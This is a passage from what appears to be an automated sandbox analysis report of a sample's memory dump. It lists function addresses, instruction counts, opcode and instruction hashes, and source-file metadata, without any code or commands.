                                                          • Instruction ID: c947214188c0dbbf0cdfa89a91c2497b3322a7c17f7b123010b3cb2e1e29d50d
                                                          • Opcode Fuzzy Hash: 10ff7962527043baba14f6a90eca2b138a51e12ea34ca705b2e42481996cd8bb
                                                          • Instruction Fuzzy Hash: FE310536D00519AFFF15DA58CA61EBFBBB4EB80750F014169A951A7250D7309E00E7E0
                                                          Function 010A892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 010A895E
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                          • API String ID: 0-702105204
                                                          • Opcode ID: 933da4089779a3bc0de73773b40ff11ccec0c74ad044cd074fac35b979861fbd
                                                          • Instruction ID: 0232ad859d2fb057942f43add5b34d5f4155f5d962413bacfb6f17860a28e47e
                                                          • Opcode Fuzzy Hash: 933da4089779a3bc0de73773b40ff11ccec0c74ad044cd074fac35b979861fbd
                                                          • Instruction Fuzzy Hash: BD0147323002119BE6696A99C984A9ABFB6EFC6695B88403EF6C106055CB206881C792
                                                          Function 010C2000 Relevance: .8, Instructions: 757COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ea22cc3f8c5925075fa74fe3863ff878be3339916e4c15c6221fa32e922af5c2
                                                          • Instruction ID: 1f982602159c32897ba03f4275fe03fd7183d9ebc27b918916890b3016bbcf83
                                                          • Opcode Fuzzy Hash: ea22cc3f8c5925075fa74fe3863ff878be3339916e4c15c6221fa32e922af5c2
                                                          • Instruction Fuzzy Hash: 2A42E0726083419BE765CF68C890A6FBBE5BF98B00F08496DFAC297650D770D849CF52
                                                          Function 010B8158 Relevance: .6, Instructions: 617COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 220f57733662858959e8c8a7fe6acc64374db4942de8a24163611d6e2cbe8da6
                                                          • Instruction ID: 39bc09ccccd41737f4a400bdcbe37848344ab6114a72f5c3e2c4ad452a5167b7
                                                          • Opcode Fuzzy Hash: 220f57733662858959e8c8a7fe6acc64374db4942de8a24163611d6e2cbe8da6
                                                          • Instruction Fuzzy Hash: 19424E75A102198FEB64CF69C881BEDBBF9BF48300F14C09AE989EB251D7349985CF50
                                                          Function 01032840 Relevance: .6, Instructions: 605COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7765c921159ce2342d60e79b39d9f416c36e50ac994ec7568e56b181f80a6c5f
                                                          • Instruction ID: 8dfcad981110223066f633d92ecc0027c5a7bb63e021ebc0df63b5860ee48083
                                                          • Opcode Fuzzy Hash: 7765c921159ce2342d60e79b39d9f416c36e50ac994ec7568e56b181f80a6c5f
                                                          • Instruction Fuzzy Hash: 41320070A087558FDB65EF69C8447BEBBF2BF84304F21416DD5CA9B284DB36A842CB50
                                                          Function 010CA118 Relevance: .6, Instructions: 591COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d42a29f843ad5ecbbf6fb08571245bad5a429cead11a4b4b752eb338ec6db195
                                                          • Instruction ID: ea4c1cb7a050c5e4df7f33f827f9a27d17bc00dcfb469e263835297ac14962a2
                                                          • Opcode Fuzzy Hash: d42a29f843ad5ecbbf6fb08571245bad5a429cead11a4b4b752eb338ec6db195
                                                          • Instruction Fuzzy Hash: 2722AB70704669CBEB658F29C45437EBBE1BF84A00F08859DE9C68B286F735D442DF60
                                                          Function 01026A50 Relevance: .5, Instructions: 548COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3b41e2950ecd6c45134c6066a11cd4446e8848993ef1929707eaedae2583babc
                                                          • Instruction ID: 2fd24a3470ea54dd47f81cf423637d89486449e1d00ca1c483393b0b621194aa
                                                          • Opcode Fuzzy Hash: 3b41e2950ecd6c45134c6066a11cd4446e8848993ef1929707eaedae2583babc
                                                          • Instruction Fuzzy Hash: B632CF70A04215CFDB65DF68C480BAEBBF1FF48310F1485A9E995AB791DB31E841CB50
                                                          Function 01044A35 Relevance: .4, Instructions: 423COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                          • Instruction ID: 7ca6206ceb837673143f396eee8d2486cbb92facdada31f8083d0c96fb10a8d6
                                                          • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                          • Instruction Fuzzy Hash: D1F15FB1E0021A9BDB55DF99C5D0BAEBBF5BF48710F088169E985EB340E774D841CBA0
                                                          Function 010B892B Relevance: .4, Instructions: 386COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d8b863a27fdbee64a42e27d260bb7d1fa99001c1c3ec49033658216e84d2c0a7
                                                          • Instruction ID: 99cd0db76ccd2182ea668be1c27a375e0e7dce7a858abc2da71575c2e89cb549
                                                          • Opcode Fuzzy Hash: d8b863a27fdbee64a42e27d260bb7d1fa99001c1c3ec49033658216e84d2c0a7
                                                          • Instruction Fuzzy Hash: FBD1E271A0060A8BDF19CF69C881AFEB7F9AF88304F18C16BD995A7251D735E905CB60
                                                          Function 010265D0 Relevance: .4, Instructions: 383COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: df8bb7e65b36b1c310e48759c8cb1b5112e89155e635d7e4039ec5299d558618
                                                          • Instruction ID: ae05b350aab38ffd573fdb55585efcd388e66856df53cde9cd202dd0fe2728df
                                                          • Opcode Fuzzy Hash: df8bb7e65b36b1c310e48759c8cb1b5112e89155e635d7e4039ec5299d558618
                                                          • Instruction Fuzzy Hash: 3FE19071608352CFC715DF28C490A6ABBE4FF89314F058AADE9D987351DB32E905CB92
                                                          Function 01018397 Relevance: .4, Instructions: 380COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 96655d25305e42bfaf805d22b264c0469171ebbc4c5bbc849e952ff8af452378
                                                          • Instruction ID: 1f22653b26d8fedaad5d8d2ce400aef05bb626809e8ab32c5b3f1ae7d361397a
                                                          • Opcode Fuzzy Hash: 96655d25305e42bfaf805d22b264c0469171ebbc4c5bbc849e952ff8af452378
                                                          • Instruction Fuzzy Hash: D8D1D671A006069BDB14DF68C880ABEB7E5BF54314F04C66EFA95DB284EB38DA54CB50
                                                          Function 010A8243 Relevance: .3, Instructions: 322COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                          • Instruction ID: e2ca79410c601fe4ded475230a323e139f429150721844f0d99d2b87296712ae
                                                          • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                          • Instruction Fuzzy Hash: 00B17374A006059FEB64DFD9C940ABBBBF9FF84305F90C45EAA8297790DA34E945CB10
                                                          Function 01030535 Relevance: .3, Instructions: 300COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                          • Instruction ID: 720eddf6b0620d552ac42b47d62ec21cf7d7a5779793b61dc03c00f84279cbdb
                                                          • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                          • Instruction Fuzzy Hash: 93B1F6316056469FDB16DB68C850BBFBBFAAF88300F144599E5D2DB385DB30E941CB90
                                                          Function 010283C0 Relevance: .3, Instructions: 281COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d51f7610b24fc9bd2c5fbfb9012ee36cf53e5e9020f3754b30a7ae06d0b4905a
                                                          • Instruction ID: 5d1e9b972679cb1f072a13431a6401586e1a3c3d2d3db3bec385efe37ea24fdd
                                                          • Opcode Fuzzy Hash: d51f7610b24fc9bd2c5fbfb9012ee36cf53e5e9020f3754b30a7ae06d0b4905a
                                                          • Instruction Fuzzy Hash: FFC147745083418FE7A4DF18C494BABB7E5BF88304F44896EE9C987291DB74E909CF92
                                                          Function 0101C427 Relevance: .3, Instructions: 280COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4f922dcbe852bd7d583b5bd357cf629ad499673a1a59d4bd4fa95ccce96772fa
                                                          • Instruction ID: ac34b8a75ac816c4e2ae0803c0fb0c6d5c336aa9c7adb2fc9bbb45f41c0946dc
                                                          • Opcode Fuzzy Hash: 4f922dcbe852bd7d583b5bd357cf629ad499673a1a59d4bd4fa95ccce96772fa
                                                          • Instruction Fuzzy Hash: AAB18170A402668BEB64CF58C980BADB7F5EF44740F0485E9D58AE7285EB34DDC5CB24
                                                          Function 0104E5E7 Relevance: .3, Instructions: 278COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c329a56d280313cdf8699f9797696f794507b1d08b5dc1456b9b93a2fb7c899d
                                                          • Instruction ID: 0bd44c58dda759336a27fa5d707da571db20fd1592d2469c782292c4d7e66c3e
                                                          • Opcode Fuzzy Hash: c329a56d280313cdf8699f9797696f794507b1d08b5dc1456b9b93a2fb7c899d
                                                          • Instruction Fuzzy Hash: F9A12B71E0421A9FEB21EB68C984BAEBBE4BF04754F0501B5EAD0AB2D1D7789D40C791
                                                          Function 01060185 Relevance: .3, Instructions: 276COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0d91dc73e11752b98bb6055a76ccd38fbda4d9fa683df4d36d9636a17049ec7b
                                                          • Instruction ID: c6175b6be484518cf9d6cabdc4332c3c9945ac9c87f9a2b8ead76c58da5a2dae
                                                          • Opcode Fuzzy Hash: 0d91dc73e11752b98bb6055a76ccd38fbda4d9fa683df4d36d9636a17049ec7b
                                                          • Instruction Fuzzy Hash: C2A1F1B0B416169BDB25DF69C990BBEB7F8FF48314F004069EA8597285EB34E841CB90
                                                          Function 010F4500 Relevance: .3, Instructions: 275COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9ce0bcb4181be9d2b3133aa09f8f278e142bda2389d5223d34ac7200c631640a
                                                          • Instruction ID: ad604fe338a04393719a95d9dd255245cb7333c76157f9b30083183f61d7ce3c
                                                          • Opcode Fuzzy Hash: 9ce0bcb4181be9d2b3133aa09f8f278e142bda2389d5223d34ac7200c631640a
                                                          • Instruction Fuzzy Hash: 01A1CC72A04212AFC715DF18C981BAABBE9FF88704F45096CEAC5DBA51C334ED41CB91
                                                          Function 010F2B57 Relevance: .3, Instructions: 266COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                          • Instruction ID: 23bd7b64751bc1339ee206cb8644c215e597b3e6afeea81f4e25a2119dde883c
                                                          • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                          • Instruction Fuzzy Hash: BAB13771E0061ADFDB59DFA9C881AADBBF5FF88300F148169EA54AB650D730E941CB90
                                                          Function 010A60E0 Relevance: .3, Instructions: 264COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 27f5df828b512329fe16d539ed737a2c3f8f762bbf91a748af0dff285575cb3d
                                                          • Instruction ID: e56059799833c48db3f793b7095f1450917bec4f5c2815de830547167edf8c29
                                                          • Opcode Fuzzy Hash: 27f5df828b512329fe16d539ed737a2c3f8f762bbf91a748af0dff285575cb3d
                                                          • Instruction Fuzzy Hash: 9B91C672D00215AFDB15CFE8D890BAEBFB5AF48710F594169E690EB340D736E9018BA0
                                                          Function 0103E3F0 Relevance: .3, Instructions: 261COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ebdc8cbb13a45a33084c9c8bf6e87e33ef027f7c6f041de2db72080fcdc59bca
                                                          • Instruction ID: a249900c92a0097b1d56bc5741abaef95a74654235f13e172cb2b72dd95533b7
                                                          • Opcode Fuzzy Hash: ebdc8cbb13a45a33084c9c8bf6e87e33ef027f7c6f041de2db72080fcdc59bca
                                                          • Instruction Fuzzy Hash: FC912431A00616DBEB24EB5DC480BBEBBE9EFC4714F0546A5E9C59B280EB34DD41CB91
                                                          Function 010EAB40 Relevance: .2, Instructions: 222COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                          • Instruction ID: 6eb920041106cd9d6884acd6e14cf0f76418030a3a88b677faa9c66a75cb86ac
                                                          • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                          • Instruction Fuzzy Hash: FA81A131B00209DFDF19DF9AC888AAEBBF2BF88310F188569D9569B345D734D911CB50
                                                          Function 0105E284 Relevance: .2, Instructions: 212COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 59a70af2a4f7d9ab378cedbb77c6581b71c2316b3fc81d9684d7c2af41686c71
                                                          • Instruction ID: 2dfe3b3b01415809bc424e6ef4cfe519580d55521e5c69ccd819908d34736ea3
                                                          • Opcode Fuzzy Hash: 59a70af2a4f7d9ab378cedbb77c6581b71c2316b3fc81d9684d7c2af41686c71
                                                          • Instruction Fuzzy Hash: 11816D71A00609AFDB65CFA9C880AEFFBF9FF88354F108429E595A7251D730AD45CB60
                                                          Function 0103C640 Relevance: .2, Instructions: 206COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 796138ca2c52f5662aada03b30db7958abed34afb57ef731e4792aa611609fba
                                                          • Instruction ID: 4755d8293d9416d462c500de3ebf15eab9cb07dcc5330dbaa6e48b42d8b1b1ae
                                                          • Opcode Fuzzy Hash: 796138ca2c52f5662aada03b30db7958abed34afb57ef731e4792aa611609fba
                                                          • Instruction Fuzzy Hash: 6971DF75904629DBDB269F58CA907BEBBF5FF98710F14816BE9D1AB350E3709800CB90
                                                          Function 010D47A0 Relevance: .2, Instructions: 202COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 1ed7fa48777949d8da3b4e2554442c6383f8dec9ad8f08cef2e51036a004d2f6
                                                          • Instruction ID: 997fb260a9a367a79545eaf6641105814294d62a8271c38c9ddaf0010d0e399a
                                                          • Opcode Fuzzy Hash: 1ed7fa48777949d8da3b4e2554442c6383f8dec9ad8f08cef2e51036a004d2f6
                                                          • Instruction Fuzzy Hash: 8C71AF70901305EFDB24DF99DA44A9EFBF8EF91300B0181AAE690E7658D7B28980CF55
                                                          Function 0103260B Relevance: .2, Instructions: 201COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b6a329bd9294321a093c9510127ae17550c649decbfe0db6efc5b302a070ef1f
                                                          • Instruction ID: 3962151f4393d8fd4ac3500ddb5b0fdf45b8fa5c2cb0757cfb075f8f100ef42d
                                                          • Opcode Fuzzy Hash: b6a329bd9294321a093c9510127ae17550c649decbfe0db6efc5b302a070ef1f
                                                          • Instruction Fuzzy Hash: 9671CC756046428FD352DF2CC484B6AB7E9FFC8310F0585AAE8D98B352DB38D846CB91
                                                          Function 010A035C Relevance: .2, Instructions: 198COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                          • Instruction ID: be4652826c2873269b23508e69a9d44fb5e4caadd4df6a2faef623f796c2062f
                                                          • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                          • Instruction Fuzzy Hash: 56716D71E00619AFDB10DFA9C984EDEBBB9FF88700F504569E585EB250DB34EA01CB90
                                                          Function 010B62A0 Relevance: .2, Instructions: 198COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 81305fa0eb2789dd6507f5e8977e61fbe7f80c98ae2bd597da10becf3b2e344e
                                                          • Instruction ID: 698958da0765c67ef251be7e970fcef7c0f7a38493767b4546b1961d24c7f874
                                                          • Opcode Fuzzy Hash: 81305fa0eb2789dd6507f5e8977e61fbe7f80c98ae2bd597da10becf3b2e344e
                                                          • Instruction Fuzzy Hash: F871F732140B01AFE731DF18C884FDABBE6FF44710F148468E695872A0DB7AE944CB50
                                                          Function 010F8324 Relevance: .2, Instructions: 192COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a3ec6384b0c9b3c8ae7d8a003376067a0ead15470924a6d5ec3ef2f35760cac9
                                                          • Instruction ID: 5e9a7278be562ec4f97ab4acc016edd187b46e8826649763f360cc62d202943c
                                                          • Opcode Fuzzy Hash: a3ec6384b0c9b3c8ae7d8a003376067a0ead15470924a6d5ec3ef2f35760cac9
                                                          • Instruction Fuzzy Hash: 96711B71E00209AFDF15DF94CC82FEEBBB9FB04750F10816AE651AB690D774AA05CB90
                                                          Function 010DA250 Relevance: .2, Instructions: 184COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2f772add248fbc88dfb9459abb4663fd3b48414329777af7cc20d019ed33f681
                                                          • Instruction ID: 7b0fceb9374e7ff021ea3ba1d8cdcfe6e849c9c87144337cb2b7a0ad758f666e
                                                          • Opcode Fuzzy Hash: 2f772add248fbc88dfb9459abb4663fd3b48414329777af7cc20d019ed33f681
                                                          • Instruction Fuzzy Hash: 16519D72A04712EFD711DE68C884B5BB7E8EBC9750F014929BA80DB150DB75ED05C7A2
                                                          Function 010C8350 Relevance: .2, Instructions: 161COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 08851bd9c57aeff0320970da3c23fc8ad713f45d2f880685226300dc68101f9f
                                                          • Instruction ID: 6f62f5ee0413279b9bd2e81893c8b5ffd56cee686200ad158f94781b0a00f58c
                                                          • Opcode Fuzzy Hash: 08851bd9c57aeff0320970da3c23fc8ad713f45d2f880685226300dc68101f9f
                                                          • Instruction Fuzzy Hash: F5518C709007059FD721DF5AC884AAFFBF8BF94B10F10861ED296576A0DBB0A545CF54
                                                          Function 0105E443 Relevance: .2, Instructions: 158COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: f37f7c84b04533a20d07b15b58bd7ea5fba02e102b7c4a6f49beb24c402ee749
